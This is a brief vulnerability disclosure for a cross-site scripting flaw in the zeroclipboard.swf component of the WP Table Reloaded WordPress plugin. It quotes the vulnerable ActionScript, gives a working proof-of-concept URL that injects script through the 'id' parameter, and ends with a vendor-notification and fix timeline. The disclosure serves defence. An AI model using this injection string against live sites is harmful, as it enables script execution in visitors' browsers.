vulnerable path:
/wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf
vulnerabile parameter:id
piece of code:
flashvars = LoaderInfo(this.root.loaderInfo).parameters;
this.domId = flashvars.id; <– vulnerable input
ExternalInterface.call("ZeroClipboard.dispatch", domId, "mouseOver", null); <- vulnerable call
POC:
/wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf?id=a\%22%29%29}catch%28e%29{alert%281%29}//
– Vendor was notified on the 23/01/2013
– Vendor released version 1.9.4 on 27/01/2013 Fixed the bug
– Reward 50 USD from white fir design on 30/01/2013